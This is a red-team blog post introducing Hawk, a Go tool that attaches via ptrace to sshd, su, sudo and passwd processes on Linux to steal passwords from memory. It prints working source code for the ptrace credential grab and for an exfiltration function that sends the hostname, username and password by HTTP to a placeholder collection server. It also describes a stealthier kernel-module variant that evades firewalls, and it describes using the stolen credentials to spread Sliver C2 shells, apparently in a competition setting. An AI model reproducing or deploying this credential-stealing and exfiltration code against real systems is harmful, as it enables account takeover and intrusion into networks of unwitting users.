Hawk's Prey: Snatching SSH Credentials

Introduction

Greetings. This week, I am excited to unveil Hawk, a tool I developed specifically for monitoring /proc for SSH, SU, Sudo, and Passwd credentials on Linux systems. Hawk is adept at escalating privileges within a network by capturing credentials in real time as they are used.

https://github.com/ProDefense/Hawk

For instance, if Hawk is deployed on a system and a legitimate user performs a password-based SSH login, Hawk can extract those credentials directly from memory and exfiltrate them to a designated web server. Crafted in Golang, Hawk not only captures administrative credentials used by sshd, sudo, passwd, and su services but also exfiltrates them back to a centralized web or C2 server.

This tool was initially created for the Western Regional Collegiate Cyber Defense Competition (WRCCDC) competition, where it performed exceptionally well, allowing our red team continuous access to all teams’ systems by capturing their active credentials.

How it works

Hawk operates by scanning the /proc folder on Linux machines every 250 milliseconds for new processes. It specifically looks for processes related to ssh, su, sudo, or passwd commands. Upon identifying a relevant process, Hawk initiates a Go routine to trace it using the following method:

func traceSSHDProcess(pid int) {
 runtime.LockOSThread()
 defer runtime.UnlockOSThread()
 err := syscall.PtraceAttach(pid)
 if err != nil {
  return
 }
 defer func() {
  syscall.PtraceDetach(pid)
 }()
 var wstatus syscall.WaitStatus
 var exfiled bool
 for {
  _, err := syscall.Wait4(pid, &wstatus, 0, nil)
  if err != nil {
   return
  }

  if wstatus.Exited() {
   return
  }

  if wstatus.StopSignal() == syscall.SIGTRAP {
   var regs syscall.PtraceRegs
   err := syscall.PtraceGetRegs(pid, ®s)
   if err != nil {
    syscall.PtraceDetach(pid)
    return
   }

   if regs.Rdi == 5 && regs.Orig_rax == 1 {
    buffer := make([]byte, regs.Rdx)
    _, err := syscall.PtracePeekData(pid, uintptr(regs.Rsi), buffer)
    if err != nil {
     return
    }

    if len(buffer) < 250 && len(buffer) > 5 && string(buffer) != "" {
     username := "root"
     cmdline, _ := ioutil.ReadFile(fmt.Sprintf("/proc/%d/cmdline", pid))
     matches := regexp.MustCompile(`sshd: ([a-zA-Z]+) \[net\]`).FindSubmatch(cmdline)
     if len(matches) == 2 {
      username = string(matches[1])
     }

     var password = removeNonPrintableAscii(string(buffer))
     if len(password) > 2 && len(password) < 100 && exfiled && !strings.HasPrefix(password, "fSHA256") {
      go exfilPassword(username, removeNonPrintableAscii(password))
     }
     exfiled = !exfiled
    }
   }
  }

  err = syscall.PtraceSyscall(pid, 0)
  if err != nil {
   return
  }
 }
}

‍

Once the credentials are intercepted, they are securely transmitted using the exfilPassword function. Below is a simplified illustration of how credentials might be exfiltrated using HTTP/HTTPS protocol in a controlled environment:

func exfilPassword(username, password string) {
 hostname, err := os.Hostname()
 if err != nil {
  return
 }
 serverURL := "http://FILL:6969/"
 values := url.Values{}
 values.Set("hostname", hostname)
 values.Set("username", username)
 values.Set("password", password)
 fullURL := fmt.Sprintf("%s?%s", serverURL, values.Encode())
 fmt.Printf("Sending to %s\n", fullURL)
 http.Get(fullURL)
}

In practice, especially for red team operations, transferring sensitive data such as credentials would typically involve more secure and sophisticated methods to ensure the data’s integrity and confidentiality. The private version of Hawk includes a suite of diverse exfiltration techniques tailored to different operational requirements. If you are interested in exploring these advanced capabilities, I invite you to reach out via LinkedIn or Twitter for more information.

Hawk in action

During the WRCCDC, teams gain access to an array of machines. From a red team perspective, the strategy is straightforward: secure access to one machine and leverage that foothold to compromise the rest of the network. While this approach seems direct, it’s typically at this juncture that many teams struggle, primarily due to credential reuse.

However, the blue teams often face an uphill battle against the private version of Hawk. In this enhanced version, Hawk operates as a kernel module, cleverly concealing itself from standard userland diagnostics. Moreover, it skillfully evades both Uncomplicated Firewall (UFW) and IPTables rules, making it a formidable tool in our arsenal.

During the competition, we utilized Hawk to intercept and relay credentials back to our base of operations. We then tested these credentials across the network to gain further access and establish Sliver shells — an advanced command and control framework. This strategic implementation led to significant network escalation, as illustrated in the following screenshot:

‍

Yes, those are all sliver sessions :)

‍

Closing Thoughts on Implementing Hawk in Red Team Operations

Implementing Hawk into red team tactics, techniques, and procedures (TTPs) offers a robust route for achieving persistent access and network escalation. By integrating Hawk, red teams can effectively bypass common defensive measures, extract critical authentication data silently, and use this information to systematically expand their control over networked environments.

For red teamers, Hawk not only serves as a tool for initial access but also supports sustained operations by providing continual data exfiltration and network testing capabilities. This dual utility makes Hawk an indispensable part of red team toolkits, especially in competitive environments like CCDC, where teams must rapidly adapt to evolving network defenses.

Hawk’s ability to remain undetected and its versatility in handling different network scenarios shows off its value in simulating sophisticated cyber threats. Such tools not only challenge the defensive strategies of blue teams but also push them towards adopting more advanced and resilient security measures.